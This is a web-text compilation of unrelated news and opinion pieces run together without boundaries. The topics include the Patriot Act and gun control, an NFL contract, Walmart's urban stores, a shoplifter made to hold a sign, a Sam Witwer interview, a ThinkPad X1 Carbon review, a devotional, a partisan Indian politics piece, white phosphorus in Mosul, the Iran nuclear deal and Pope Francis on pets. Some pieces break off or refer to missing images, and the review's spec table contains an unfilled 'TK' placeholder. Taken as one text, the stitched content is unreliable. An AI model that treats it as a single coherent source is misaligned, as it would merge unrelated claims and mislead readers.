Just look at the Fourth Amendment for an example . When the Patriot Act was enacted , civil libertarians screamed that Big Brother Bush was attacking the right to privacy . They were right . Today , our e-mail , social media , banking records , credit card information , web history — literally any private information you can imagine — is sifted through by the federal government on a regular basis . Some have estimated the number of such intrusions to be in the millions , billions , or more . We will never know the real number because that information is classified . Yes , how much our government regularly ignores the Constitution is kept secret thanks to the Patriot Act .
In 2011 , Democratic Sen. Ron Wyden spoke on the Senate floor about how bad the Fourth Amendment was being abused : `` I have served on the Intelligence Committee for a decade , and I want to deliver a warning this afternoon : When the American people find out how their government has secretly interpreted the Patriot Act , they will be stunned and they will be angry . And they will be asking senators , 'Did you know what this law actually permits ? ' ... Many members of Congress have no idea how the law is being secretly interpreted by the executive branch , because that interpretation is classified . ''
The few examples where information has been declassified offer a startling glimpse into the true damage done by the Patriot Act . The act itself is bad enough , but it has also created a law enforcement culture that feels free to do anything it likes , legal or not . The digital rights group Electronic Frontier Foundation used the Freedom of Information Act to force the FBI to admit that they had violated the law approximately 800 times under the guise of conducting Patriot Act-approved intelligence work ( In total , some 7,000 potential violations were investigated ) . Although these violations were reported to the president 's Intelligence Oversight Board , no one would have known about these abuses if not for the Electronic Frontier Foundation .
When it comes to any new gun-control legislation , Feinstein 's bill will thankfully be hard to pass , but this does not mean she and her allies will stop trying . We already know that she intends to expand definitions in the direction of more gun control , yet the Left will continue to say that gun rights advocates are just being alarmists . But during the debate over these new far-reaching laws , it is usually those `` alarmists '' who end up being right . When Social Security was enacted , opponents feared that it might one day be used as a form of identification , but its advocates scoffed at the idea . We know how that turned out .
The government will eat up the Second Amendment just as surely as it has the Fourth and the rest of the Bill of Rights . This is why our Founding Fathers spent so much time warning against its dangers . And it is why we should start listening to them .
Giants running back Brandon Jacobs confirmed today his representatives have spoken with the team about his future and that the organization is asking him to take a significant pay cut .
The seven-year veteran running back says he would consider one , though not a significant slashing of the $ 4.9 million he 's owed in the final season of his contract .
“ I want to stay in New York a whole lot , man , because this is where I started , ” Jacobs said in an interview with NBC-4 's Bruce Beck . “ It 's a great organization . I got wonderful , great teammates . I won a second Super Bowl here with this organization .
“ But I 'm not willing to sell my soul , you know ? It 's a great organization and I want to be a part of it , but if they 're not feeling the same way , then so be it . ”
Someone informed of the talks between the sides at this past weekend 's Scouting Combine said the Giants are interested in bringing Jacobs back but not at the current price . The person , who requested anonymity because neither the team nor Jacobs ' reps have spoken about the details of the talk , did n't provide specifics of the team 's offer but said it 's a big cut from what Jacobs is currently scheduled to make .
Jacobs , 29 , is believed to be seeking a multi-year deal .
“ I feel like I 'm 25 years old , ” he told Beck . “ I feel really good . I 'm not banged up , did n't have any surgeries this offseason , I did n't have any problems . Nothing is hurting me . I feel great right now .
“ I feel like I can give somebody about three more years and I 'm looking forward to being done after that . But right now I 'm not done . I 've still got a lot of gas in my tank and I 'm ready to go . ”
Mike Garafolo : mgarafolo @ starledger.com ; twitter.com/MikeGarafolo
In recent years Walmart has emerged as a superpower in the suburbs . They have been taking over suburbia to the point where it people feel as if there is a Walmart in every neighborhood . Now Walmart is working on their next business plan ; to move their stores into the more urban environment .
Walmart is talking about building stores in several major cities including New York , San Francisco , and Washington DC . The new stores will be significantly smaller than the super centers that exist in the suburbs . The stores will be closer to 20 thousand square feet as opposed to 150 thousand . This drastic change is size is just one of the hurdles that Walmart is facing when trying to relocate to our cities .
So what 's the potential problem ?
Walmart has already proven that when it enters an area it takes away from the local businesses and sometimes destroys family owned stores . This has been common in suburbia , which is one reason why every suburb in America feels the same . If Walmart is successful at entering the city we may see this same thing happen in a more urban environment .
Currently our cities are full of diversity and independently owned shops/businesses . This is one of the things that make our cities so unique . Walmart would probably drastically change the cultural diversity of the city and take away from the existing storefronts . In the worst case scenario , it would make places go out of business and leave storefronts empty , in effect destroying a city 's walkability .
Also , local businesses are there for the long term . Businesses try to keep money in the neighborhood and build the surrounding area . Walmart , on the other hand , has been known to build a store and relocate several years later to a spot a mile down the road .
I will be following this developing story closely in the future to see how it plays out . Hopefully the Walmart invasion will prove to not hurt our cities , but due to its effect on the suburbs It 's hard to not expect the worst .
Picture thanks to Global Giants and Greater Greater Washington
Teenager shoplifting in costume store forced to hold a sign out the front saying he got caught ( while in costume , of course )
An 18-year-old Virginia man who was caught shoplifting at a costume store has accepted a rather unusual punishment .
Andrew Perry , the owner of the Halloween Express costume store in Charlottesville , told the light-fingered teenager that he would not call the police - if instead the youth stood in front of the store with a sign saying he was caught shoplifting .
In a bizarre twist , Mr Perry also told the boy that he would have to dress as Sesame Street character Bert , as in Bert and Ernie .
Unusual punishment : The unnamed 18-year-old has been forced to wear a Bert costume and hold a sign saying he was caught shopliting
So the teenager agreed to spend six hours over two days in front of the store , in costume , holding a sign that reads : ' I got caught shoplifting at Halloween Express . '
Mr Perry said he came up with the unorthodox punishment because he did n't want the shoplifter to have a criminal record .
Store owner : Andrew Perry , of Halloween Express , said that he did not want to involve police in the incident
He said : 'It could mess the rest of his life up - 18 years old , you go to get another job and it shows that you 've been caught shoplifting . Nobody wants to have someone working for them who has a criminal background . '
The punishment echoes that of a more serious crime in Houston .
A man who stole money from victims of crime has been ordered to stand on a busy city street with a sign saying he is a thief - every weekend for the next six years .
Daniel Mireles has been walking back and forth on Westheimer in Houston - in front of the Galleria shopping centre - with a sign saying he is a thief .
In large capital letters , his sign reads : ' I am a thief . I stole $ 250,000 from the Harris County crime victim 's fund . Daniel Mireles . '
Judge Kevin Fine ordered the public humiliation as part of Mireles 's sentence .
His wife Eloise , a former county employee , was also convicted of theft in July . She 'll serve the same public punishment once she gets out of jail .
He also force4d them to display a sign in front of their home that reads : 'The occupants of this residence are convicted theives . They stole $ 250,000 from the Harris County Crime Victm 's fund . Signed , Judge Kevin Fine . '
Sam Witwer is about to become a werewolf . No , he 's not swapping supernatural curses with Sam Huntington on Syfy 's Being Human . Instead , he 's trading in his vampire fangs for claws and a fur coat to guest-star as a Wesen with a problem on NBC 's Grimm tonight .
“ I 'm playing a werewolf , which is a real shift , ” Witwer told Blastr in an exclusive interview . “ I 've got to tell you , Huntington does it better , as does Silas. ” Silas is Silas Weir Mitchell , who plays Monroe on Grimm , a reformed big bad wolf Wesen or a Blutbad .
In the episode , “ The Show Must Go On , ” Witwer 's Grimm character is a Wesen who is “ part of this freak show . And because he 's forced into this creature for this freak show , he does it so much that he develops this condition . When they turn too much , they start losing control . They start losing who they are . They start losing their identity to the beast , as it were , ” he said .
“ Basically , there are some murders . And presumably my character is committing them . So that 's were we start . This guy is kind of the bad guy , ” said Witwer .
“ The way that the story is structured , there was n't a lot of opportunity to delve into this character other than the fact that he 's a man in crisis . So we 're not going to get a lot of sense of humor from this guy , for example . He is basically his problem right now , and that 's basically what we explore in the episode , ” he said .
Getting furry was n't easy
For Witwer , there were some challenges when it came to sinking his teeth into the role .
“ I honestly did n't understand how to play it . I can tell you that . It took me a few days to know what I was doing on that show , and they were like , 'Well , what do you mean ? You 're on Being Human . ' And I 'm like , 'Dude , this is not what we do . Being Human is hanging out in the kitchen and cracking lines at each other . ' On Being Human , I play a heroin addict , basically . He 's not really a vampire . He 's a heroin addict . So it took me a second to know what was going on . Silas was very helpful , ” he said .
“ We 're all very happy that we got to end it on our terms . ''
As for his work on Being Human , which ends its run after four seasons on April 7 , Witwer said he 's proud of the work they 've done .
“ We 're all very happy that we got to end it on our terms rather than having some sort of financial mandate to do something that we would n't necessarily believe in , ” said Witwer .
“ The entire season was to wrap up the series . The fans did n't know that , but we 've known this for a year . And so we got a chance to really finish the story as we intended it . That 's the most satisfying thing about it , because when you 're on a show and you 're doing all these stories , especially a show like Being Human where every episode leads to the next episode ... I mean , the whole thing is one big story . We do n't do one-offs , you know ? When you 're doing that , you do wonder , 'Are we going to be able to wrap up this big , epic story in a way that will be correct ? In a way that will make the right statements , that will have the right values , that will make this all make sense ? ' It 's with a great amount of relief that I feel like I can report to you that we did that . I think we did , ” he said .
Initially the Aiden/Sally romance did n't `` make any sense ''
One big development this season has been the romance between Witwer 's Aidan and Meaghan Rath 's Sally .
“ The fans have mostly been for that , but then there 's a fairly large contingent , like 30 percent , that are against it . And I just wonder by the end of it how much we will have turned them , because we 've certainly been having a lot of fun with it . I definitely read on Twitter after the last episode , there were a lot of people chiming in going , 'OK , OK. You got me . I was against it , but now I 'm for it . ' It 's , hopefully , because we 've been having fun with it and we 've been doing unexpected things , ” said Witwer .
The actor admits that when the idea for the romance first came up , he was n't exactly for the Aiden/Sally of it all either . “ I was against it when the writing room would bring it up early on . I was like , 'It does n't make any sense . Sally 's like a little kid and Aidan is this really old guy . They just do n't have that in common . She 's too naive and Aidan is too jaded . ' But as the series went on , Sally grew up a lot and Aidan kind of lightened up . Suddenly these characters were sharing a lot more common ground than they used to . If you watch season three , there 's always some sort of weird spark between Aidan and Sally . It did n't necessarily exist in seasons one and two . But in season three there would be scenes that were not written with any kind of romantic slant to them , and then next thing you know , me and Meaghan Rath , there 's just a weird vibe . You 're like , 'What 's going on with these two ? What 's happening ? '
“ Between the seasons , Anna Fricke got a hold of me and she 's like , 'Okay , we 're wrapping up the series this year . What do you think ? Do you think it could happen ? ' And I 'm like , 'If you asked me at any other time I 'd say no . But after season three , let 's do it . Let 's go for it . Why not ? It might be really fun . ' I think the way that they did it was fantastic , to have these alternate-universe episodes where Sally goes off to essentially a different portion of the show where all the characters meet each other in different ways . And fourth-season Sally is a pretty good match for first-season Aidan , ” he said .
`` I think we did the name proud . ''
“ The good news is that it 's a complete story and it will always be on Netflix . It will always be available out there . Between the British series that did 37 episodes and we did 52 , there 's a lot , ” said Witwer .
The British Being Human completed its run last year , meaning that , for the first time since 2008 , there will be no series called Being Human on TV after the Syfy version leaves the air in April . The British series was created by Toby Whithouse , and then the story was developed for Syfy by Jeremy Carver and Anna Fricke .
Although the storylines for the shows veered in different directions , the core story remained about a vampire , a ghost and a werewolf who live together as roommates , all the while struggling to keep their humanity .
“ There are a lot of stories about them . I think we did the name proud . Thankfully , I 'm happy to report , Toby Whithouse seems to agree with me . He wrote me a very nice email recently expressing that he felt we did it right , ” said Witwer .
Here 's a preview of tonight 's Grimm , “ The Show Must Go On , ” which airs at 9 p.m. on NBC :
Grimm airs on NBC on Fridays at 9 p.m . Being Human airs on Mondays at 9 p.m. on Syfy .
Are you ready to see a whole new side of Sam Witwer ?
Lenovo , keeper of the venerated ThinkPad brand , was one of the first Windows laptop makers to directly take on Apple 's MacBook Air , with its 13-inch ThinkPad X1 . This was before Intel had begun publicly branding thin laptops with its trademarked ultrabook tag , and the rules for this new class of thin laptops were still in flux . We called that original X1 `` an appealing middle ground for business road warriors , '' but also said , `` It 's not as sleek or as light as a MacBook Air -- not by a long shot . ''
Lenovo 's ultrathin ThinkPad is reborn as a 14-inch ultrabook , the X1 Carbon . When we first spotted the X1 Carbon at a Lenovo press event earlier in 2012 , I thought it might not depart enough from the original . The name was nearly the same ( not even called the `` X2 '' ) , and it looked a bit thinner , but not all that much evolved from last year 's X1 .
Getting an opportunity to test and review the final version of the ThinkPad X1 Carbon makes a big difference . Lenovo previously stated that it would be the world 's lightest 14-inch laptop at 3 pounds , and in the hand , you can definitely feel it . This is clearly a premium product , thanks to the light weight and the carbon fiber lid .
The components are standard , with a third-gen Intel Core i5 CPU , integrated Intel HD 4000 graphics , and a 128GB solid-state drive ( SSD ) . That 's a fairly standard loadout , and available in some very affordable laptops . But no one would describe the X1 Carbon as affordable . It starts at $ 1,399 , and our review configuration is $ 1,499 ( with a mobile broadband modem ) . More expensive builds , with faster processors and a 256GB SSD , cost up to $ 1,849 .
Of course , you get a lot of extra features that may help justify the higher price : Lenovo 's industry-leading keyboard , a revamped glass touch pad that works better than any Windows touch pad I 've tried , a suite of Lenovo-branded security and support apps , and IT-department-friendly features like Intel 's vPro technology . On the downside , battery life , an area Lenovo normally does very well in , was merely adequate , at a just over 5 hours .
Even though this is still a business-targeted ThinkPad , it 's also one of the most satisfying ultrabook laptops I 've used this year . It 's expensive , especially compared to much of the ultrabook competition , and has a handful of quirks , but if you 're willing to make a sizable investment , it 's the ultrathin 14-inch ultrabook to beat .
Price as reviewed / Starting Price $ 1,499 / $ 1,399 Processor Intel Core i5-3427U Memory 4GB , 1333MHz DDR3 Hard drive 128GB SSD Chipset Intel HM77 Graphics Intel HD4000 Operating System Windows 7 Home Premium ( 64-bit ) Dimensions ( WD ) 13.0 x 8.9 inches Height 0.74 inches Screen size ( diagonal ) 14.0 inches System weight / Weight with AC adapter 3.0/TK pounds Category Midsize
Design and features
While the design is familiar , the X1 Carbon is much thinner than the original X1 , and the front tapers to a sharper edge . The top cover is made of carbon fiber , typically found in only the most expensive laptops , as is the system 's internal roll cage , a stiff latticework that protects the laptop but adds minimal extra weight .
The matte-black look is universal enough that I doubt it 'll ever look truly dated , but there 's also not much forward-thinking about the aesthetics , either , considering PC makers ( plus Apple ) have been churning out ultrathin systems for some time . It 's the weight that really sells the design . On the table , it looks like a standard , very thin 14-inch laptop , but pick it up , and it feels surprisingly light . Despite having a bigger screen and bigger footprint , it weighs just about the same as a 13-inch MacBook Air .
The keyboard retains the modified island-style keys used in the first X1 , a look that comes from Lenovo 's consumer line and that is slowly making its way into ThinkPad models as well . It 's also backlit , which is a feature every travel-oriented laptop should have . As with other island-style Lenovo keyboards , the individual keys have a slightly convex curve at the bottom . I 've found that bit of extra surface area makes typing easier , and mistakes less frequent . Lenovo refers to the shape created by the keys and the space between them as the `` forgiveness zone . ''
Many thin laptops have shallow , clacky keys that are better than typing on something like the iPad 's virtual keyboard , but often not by much . Even on this slim chassis , the keys have excellent depth and solid , tactile feedback . It 's definitely the best ultrathin laptop keyboard I 've used .
The touch pad is a bit of a departure from the usual Lenovo style . Instead of a touch pad with separate left and right mouse buttons below , it 's a one-piece click pad with a glass surface , similar to what you 'd get on a MacBook or Dell XPS . Lest you think we 're going too far off the beaten track , there is still a second set of mouse buttons above it , and a traditional Lenovo ThinkPad trackpoint nestled between the G , H , and B keys .
The slick glass surface is a welcome change from the normal sluggish feel of so many Windows touch pads , and the overall feel of navigation and multitouch gestures is much more responsive than the norm . Many touch pads have a matte finish , with varying degrees of finger drag , but the glass surface here is surprisingly slick and friction-free .
A separate touch-pad settings menu , called UltraNav , allows you to tweak the behavior slightly , including adding a trackball-like momentum feature ( which just made mousing very imprecise ) , and designating one corner as a tap-to-right-click zone ( as opposed to having to push down on the lower right corner ) . I did n't see the touch-pad option I wanted most , which was to use a two-finger tap anywhere on the pad as a right click ( as found in OS X ) , but you can set a two-finger click to do that .
The display is excellent , with a matte finish on the 14-inch , 1,600x900-pixel-resolution screen . I 've seen more high-end laptops lately add a full HD 1,920x1,080 screens . On a 15-inch system , it works , but on a 13-inch it 's too much , making text and icons too small . On a 14-inch , you could go either way , but I 'd lean toward 1,600x900 , as seen here , as the sweet spot . The screen is bright and colorful , despite the lack of a glossy coating . My colleagues and I almost universally prefer matte screens , and are generally disappointed to only find them in business-targeted laptops .
You may never use this feature , but it 's interesting to note that the screen folds nearly 180 degrees back , lying almost flat . There have not been many times I 've wished my laptop would open wider , but I suppose there have been a handful .
The Lenovo X1 Carbon 's speakers get surprisingly loud , and a Dolby Home Theater v4 software package lets you tweak the EQ and other sound settings a bit . But it 's still not going to turn this into the sound system for your next house party . Besides , people do n't buy ThinkPads for their great speakers -- but they do buy them for the microphone and Webcam , as used in videoconferencing . Using the handy built-in videoconferencing app , you can set the mic 's pickup pattern , turn on face tracking on the camera , and even send an image of your desktop as your outgoing video feed .
Lenovo ThinkPad X1 Carbon Average for category [ midsize ] Video DisplayPort VGA , plus HDMI or DisplayPort Audio Stereo speakers , headphone jack Stereo speakers , headphone/microphone jacks Data 1 USB 3.0 , 1 USB 2.0 , SD card reader 2 USB 3.0 , 2 USB 2.0 , SD card reader Networking Ethernet ( via USB dongle ) , 802.11n Wi-Fi , Bluetooth , mobile broadband Ethernet , 802.11n Wi-Fi , Bluetooth , optional mobile broadband Optical drive None DVD burner
Connections and configurations
This is a business laptop , at least on paper , so some consumer-friendly features , such as the HDMI port , get jettisoned . Somewhat surprisingly , Ethernet gets downgraded to a USB dongle as well . While nearly every other current laptop offers two or more USB 3.0 ports , the X1 has one USB 3.0 and one USB 2.0 . A handy `` airplane mode '' switch on the left edge turns off all the system 's radios if needed .
Help us , O God of our salvation , for the glory of your name ; deliver us , and atone for our sins , for your name 's sake ! – Psalm 79:9 ESV
The forgiveness of our trespasses in the atoning work of Christ Jesus , that cleansed us from all our iniquities , was first and foremost not for us but God 's own concern for His holy Name . It was not for our sake , O Christians , that God acted , but for the sake of His holy name , which we have profaned among the nations . For His name 's sake , God pardon our guilt , for they were great .
It was the will of God to crush Christ Jesus , for it was impossible for the blood of bulls and goats to take away our sins . God laid on Christ Jesus the iniquity of us all . God put Christ Jesus to grief ; when Christ 's soul made an offering for our guilt . God acted to show His righteousness at the present time . He acted so that he might be just and the justifier of us whom He chose in Christ , according to the purpose of His wills , before the foundation of the world , that we should be holy and blameless before Him .
For God 's own sake , for God 's own sake , He so loved the world that He send His Son to live , die and rise again . For how could God 's name be profaned ? His glory He will not give to another .
God vindicated the holiness of His great name through us that the world may see before their eyes . Christ Jesus took us out of the world and gathered us from all the nations to bringing us into God 's rest . God will not forsake those who are in Christ , for His great name 's sake . It pleased Him to make us a people for Himself .
At the Cross , God sprinkles clean water onto us that we may be clean from all our sins , and from all counterfeit gods . He makes us sinless .
He removed the heart of stone and gave a new heart of flesh . He put a new spirit , His Spirit within us that causes us to walk in his statutes and careful do His will .
He makes us delight in Himself as He gives us the desires of our heart , the full joy in glorifying and fully enjoying Him forever .
In Christ Jesus , the Holy , Holy , Holy God calls us his people and He , our God . It is not for our sake that God acted , declares the Lord God , let that be known to you .
O Lamb of God that take away our sins , deal on our behalf for your name 's sake ; because your steadfast love is good , deliver us we pray . With us all be the grace of our Lord Jesus Christ , we us all be the love of God the Father and with us all be the fellowship of the Holy Spirit .
Ezekiel 36 , loaded with Roman 3:26 , Ephesians 1 : 3-11 , Isaiah 6:3 ; 48:11 , 58:14 ; 1 Samuel 12:22 , John 3:16 , Psalm 37:4 ; 106:8 ; 109:21 , Hebrews 10:4 , 2 Corinthians 13:14
Question : Does God 's zeal for His glory challenges you to ponder your position ? Give reasons
Earlier this week , when Yogi Adityanath threw stats about Kerala 's health situation in the face of the CPI ( M ) , the secular brigade exploded in anger . First the BJP makes the Communist policy of mass murder in Kerala a national issue and now it is trying to rip apart the carefully constructed web of lies around Kerala 's “ prosperity ” by sympathetic media over the years .
In extreme panic , Scroll published right away this booming headline…
With a headline like this , Scroll must have big stats to back their words up . The left was getting ready to debunk Yogi Adityanath all over the place , with Catch , Wire , Newslaundry and Altnews joining the party .
But you know things are n't going well when Scroll has to admit this in the article :
This sad admission is hilarious for several reasons . So the way that Scroll is trying to save the CPI ( M ) government from the BJP 's onslaught is by saying two things :
( 1 ) UP may be doing better this year after BJP coming to power , but things used to be much worse in UP last year under the secular government of Akhilesh Yadav !
( 2 ) Kerala may be doing badly this year under CPI ( M ) , but it did better last year when CPI ( M ) came to power only in the late summer !
Is Scroll trying to debunk the BJP or its own secular liberal friends ?
I 'm not kidding . This is still from the Scroll article “ debunking ” Yogi Adityanath . Is Scroll debunking him or debunking itself ? LOL
And watch this :
Would you believe I am still quoting the leftist propaganda blog Scroll ?
So , will Scroll graciously admit defeat and congratulate Yogi Adityanath for his stellar performance ? You 'll never guess what Scroll does next :
Whoa ! What a thing to say !
Who is in charge of public sanitation and control of mosquitoes in Uttar Pradesh ? Rahul Gandhi ?
So , they discover that Yogi Adityanath lied when he claimed he made the hospitals in Uttar Pradesh better . When in fact Yogi Adityanath only made sure that people did n't fall sick and have to go to hospital in the first place !
Yeah some lie they have caught !
So , I decided to go to the website of the National Vector Borne Disease Control Program and take a look at the stats for myself .
Here [ pdf ] are the numbers for Malaria :
Here [ pdf ] are the numbers for Japanese Encephalitis ( till Aug 31 , 2017 ) :
Here are the numbers for Dengue ( till Aug 20 , 2017 ) :
And finally , here are the numbers for Chikungunya ( till Aug 20 , 2017 ) :
If you are an actor or artist who plans to return an award to protest against the “ intolerance ” of Yogi Adityanath , this would be a good time , now that he seems to be carrying out a genocide in UP … of mosquitoes .
And if you are a journalist , just reject all the data above , and say that it 's the “ maahaul ” that matters , not data .
Before you go , we thought you 'd like these ...
ISIS is claiming that U.S. forces have used white phosphorus in residential areas of Mosul , Iraq , raising concerns among human rights groups which say the application of the incendiary material against civilians may constitute a war crime .
`` The enemies of Allah claimed that they do n't use chemical substances or white phosphorus in Mosul , but you can see these remnants , '' said a masked militant in a video posted by the group on Saturday . On Amaq News agency , an official ISIS propaganda branch , ISIS vowed to carry out a chemical attack against U.S. forces as retribution .
An ISIS-affiliated channel on Telegram , moreover , claimed that 146 people were killed and 109 were injured as a result of white phosphorous shelling on Mosul over the past three days . The numbers could not be independently verified .
Uploaded By : fdd fdr3
Caption : Video released by ISIS ' Amaq News Agency allegedly showing White Phosphorus in a residential area in Mosul .
`` Oh leaders of the Islamic State , your supporters around the world ask you to attack the Crusaders and Shiites with a chemical weapon and exterminate them , '' wrote a prominent user on al-Minbar , a leading online forum used by ISIS supporters . Another user there shared a manual for creating chlorine gas at home , which he said should be used against `` the infidels . ''
White phosphorus is a self-igniting weapon that can be used as a smoke screen to mask the movement of forces on the ground , mask the origins of fire , or can be used to signal to other troops .
According to international law , the use of the material is forbidden in civilian areas , since it can also cause severe , thermal and chemical burns when it comes into contact with the flesh . It can burn the skin down to the bone . Amnesty International has classified its use inside , or in the vicinity of , civilian areas as an indiscriminate attack and a possible war crime .
However , the potential attacks on Mosul are not the first use of WP as an `` incendiary weapon . '' Last October , ISIS claimed that several villages near Mosul were attacked with WP . The claim was backed up by Amnesty International , which reported having received credible witness accounts and photographic evidence of white phosphorus projectiles fired over an area north of the village of Karemlesh , about 12 miles east of Mosul .
Previously , the U.S. used WP as an `` incendiary weapon '' during the battle to reclaim the Iraqi city of Fallujah from al-Qaeda-affiliated militants in 2004 . It was reported that the U.S had supplied Saudi Arabia with white phosphorus munitions in its war in Yemen , based on images and videos posted to social media .
Iraqi forces , backed by a U.S.-led coalition , have reclaimed around 30 percent of west Mosul from ISIS , local Iraqi senior commanders have told Reuters . Mosul was the most important ISIS stronghold in Iraq . Battles surrounding the city are the largest U.S. offensive in Iraq since the American invasion in 2003 .
14 PHOTOS Inside the sheer terror of the front line of Mosul See Gallery Inside the sheer terror of the front line of Mosul A man cries as he carries his daughter while walking from an Islamic State-controlled part of Mosul towards Iraqi special forces soldiers during a battle in Mosul , Iraq March 4 , 2017 . Reuters Photographer Goran Tomasevic : `` Both screaming in terror , a father and the young daughter he cradled in his arm fled through the rubble-strewn streets of Wadi Hajar , transformed in a flash into a battleground between Islamic State fighters and Iraqi special forces . They and their neighbours - some wearing rubber sandals , some barefoot - were running from an IS counter-attack in this part of Mosul , dodging gunfire as the militants closed in . When they reached the special forces lines , males were ordered to lift their shirts to prove they were n't suicide bombers . Some had to take off their clothes or show their belts , though not those carrying children . The father was so beside himself , so panicked . It was obvious because he had a short shirt on and was carrying a child that he wasn ? t Islamic State . I believe they will both be taken to a refugee camp . '' REUTERS/Goran Tomasevic SEARCH `` TOMASEVIC FATHER '' FOR THIS STORY . SEARCH `` WIDER IMAGE '' FOR ALL STORIES . TPX IMAGES OF THE DAY An Iraqi special forces soldier helps a family carry their child to cross from Islamic State controlled part of Mosul to Iraqi forces controlled part of Mosul , Iraq , March 4 , 2017 . Picture taken March 4 , 2017 . REUTERS/Goran Tomasevic TPX IMAGES OF THE DAY An Iraqi special forces soldier fires at a drone operated by Islamic State militants Islamic State militants in Mosul , Iraq , March 4 , 2017 . Picture taken March 4 , 2017 . REUTERS/Goran Tomasevic TPX IMAGES OF THE DAY An Iraqi family walks from Islamic State controlled part of Mosul towards Iraqi special forces soldiers during a battle in Mosul , Iraq , March 4 , 2017 . Picture taken March 4 , 2017 . REUTERS/Goran Tomasevic TPX IMAGES OF THE DAY Men and woman cry while carrying a child as they run from Islamic State controlled part of Mosul towards Iraqi special forces soldiers during a battle in Mosul , Iraq , March 4 , 2017 . Picture taken March 4 , 2017 . REUTERS/Goran Tomasevic TPX IMAGES OF THE DAY An Iraqi special forces soldier checks men for explosive belts as they cross from Islamic State controlled part of Mosul to Iraqi forces controlled part of Mosul , Iraq , March 4 , 2017 . Picture taken March 4 , 2017 . REUTERS/Goran Tomasevic TPX IMAGES OF THE DAY Iraqi special forces soldiers walk in a street in Mosul , Iraq , March 4 , 2017 . Picture taken March 4 , 2017 . REUTERS/Goran Tomasevic A woman cries after crossing from Islamic State controlled part of Mosul to Iraqi forces controlled part of Mosul , Iraq , March 4 , 2017 . Picture taken March 4 , 2017 . REUTERS/Goran Tomasevic A man runs from Islamic State controlled part of Mosul towards Iraqi special forces soldiers during a battle in Mosul , Iraq , March 4 , 2017 . Picture taken March 4 , 2017 . REUTERS/Goran Tomasevic Iraqi policemen walk during an airstrike against Islamic State militants in Mosul , Iraq , March 4 , 2017 . Picture taken March 4 , 2017 . REUTERS/Goran Tomasevic A man gestures as he walks from Islamic State controlled part of Mosul towards Iraqi special forces soldiers during a battle in Mosul , Iraq , March 4 , 2017 . Picture taken March 4 , 2017 . REUTERS/Goran Tomasevic A man cries while he carries his daughter as he walks from Islamic State controlled part of Mosul towards Iraqi special forces soldiers during a battle in Mosul , Iraq , March 4 , 2017 . Picture taken March 4 , 2017 . REUTERS/Goran Tomasevic A man cries while carrying his daughter as he walks from Islamic State controlled part of Mosul towards Iraqi special forces soldiers during a battle in Mosul , Iraq , March 4 , 2017 . Picture taken March 4 , 2017 . REUTERS/Goran Tomasevic Up Next See Gallery Discover More Like This HIDE CAPTION SHOW CAPTION of SEE ALL BACK TO SLIDE
The post Is The U.S . Using White Phosphorus In Iraq ? appeared first on Vocativ .
US President Donald Trump 's expected move to “ de-certify ” the international nuclear deal with Iran is driving a wedge between Europe and the United States and bringing Europeans closer to Russia and China , Germany said on Thursday ( 12 October ) .
German Foreign Minister Sigmar Gabriel has spoken out repeatedly against Trump 's likely step , but his latest comments aimed to spell out the impact it would have in starker terms .
“ It 's imperative that Europe sticks together on this issue , ” Gabriel , a Social Democrat , told the RND German newspaper group . “ We also have to tell the Americans that their behaviour on the Iran issue will drive us Europeans into a common position with Russia and China against the USA . ”
Trump is seen unveiling a broad strategy on confronting Iran this week , likely on Friday , including a move to de-certify Iran 's compliance with the 2015 accord , which he has called an “ embarrassment ” and the “ worst deal ever negotiated ” .
Trump expected to decertify Iran nuclear deal , official says President Donald Trump is expected to announce soon that he will decertify the landmark international deal to curb Iran 's nuclear program , a senior administration official said yesterday ( 5 October ) , in a step that potentially could cause the 2015 accord to unravel .
Senior US officials , European allies and prominent US lawmakers have told Trump that refusing to certify the deal would leave the US isolated , concede the diplomatic high ground to Tehran , and ultimately risk the unravelling of the agreement .
Mogherini : No need to renegotiate Iran nuclear deal EU foreign policy chief Federica Mogherini said Wednesday ( 20 September ) that there was no need to renegotiate the Iranian nuclear deal , insisting it was “ delivering ” despite US demands to re-open the agreement .
The UN nuclear watchdog has repeatedly certified that Iran is adhering to restrictions on its nuclear energy programme mandated by the deal to help ensure it can not be put to developing atomic bombs .
Signed by the United States , Britain , France , Germany , Russia , China , the European Union and Iran , the deal lifted sanctions on Tehran in exchange for curbs on its nuclear work .
Germany has close economic and business ties with Russia , although relations have soured since Moscow 's annexation of Ukraine 's Crimea region . Berlin is also working to expand ties with China .
Gabriel is expected to leave his post in coming months since his Social Democrats have vowed to go into opposition after slumping badly in the 24 September election , opting not to reprise an awkward “ grand coalition ” with Merkel 's conservatives .
Merkel and allies reach common ground on migration , coalition talks loom German Chancellor Angela Merkel 's Christian Democrats ( CDU ) reached a deal on migrant policy with her conservative Bavarian allies on Sunday ( 8 November ) , removing a major obstacle to pursuing talks on a coalition with other parties . In an apparent concession , Merkel agreed …
Gabriel on Monday urged the White House not to jeopardise the nuclear agreement , saying such a move would worsen instability in the Middle East and could make it more difficult to halt nuclear arms programmes in other countries .
In the interview released on Thursday , he said the nuclear agreement was being treated “ like a football ” in US domestic politics , but the issue could have serious consequences .
He said Russia was watching developments closely , including the divisions between Europe and the United States . “ That does n't exactly strengthen our position in Europe . ”
Ultimately , Gabriel told the newspaper group , there were only three countries – the United States , Russia and China – that could avert a new nuclear arms race .
“ But those countries mistrust each other so much at the moment that they are not working together sufficiently . It must be in our interest to press for more trust . ”
Pope Francis had a message for married couples on Monday : four-legged friends do n't offer the same opportunities for love and godliness as raising a child .
The Pope addressed a group of 15 couples that have been married between 25 and 60 years during daily Mass on Monday , held in the chapel of the Santa Maria residence in the Vatican . The Pope stressed the importance of three qualities in a successful Christian marriage — faithfulness , perseverance and fruitfulness — during his remarks , according to Vatican Radio .
The Brief Newsletter Sign up to receive the top stories you need to know right now . View Sample Sign Up Now
But the Pope also counseled childless couples to be fruitful and multiply , and not spend time raising pets when they could be raising children . Mentioning the “ culture of well-being , ” similar to one mentioned in the 2013 TIME cover story “ The Childfree Life , ” Pope Francis said that while a childless life offers better vacation opportunities , it will end in solitude :
This culture of well-being from 10 years ago convinced us : It 's better not to have children ! It 's better ! You can go explore the world , go on holiday , you can have a villa in the countryside , you can be care-free … it might be better — more comfortable — to have a dog , two cats , and the love goes to the two cats and the dog . Is this true or is this not ? Have you seen it ? Then , in the end this marriage comes to old age in solitude , with the bitterness of loneliness . It is not fruitful , it does not do what Jesus does with his Church : He makes His church fruitful .
In other words , all the effort you spend caring for your furry friends would be of better use if Fido or Fifi were children .
[ Vatican Radio ]
Contact us at editors @ time.com .
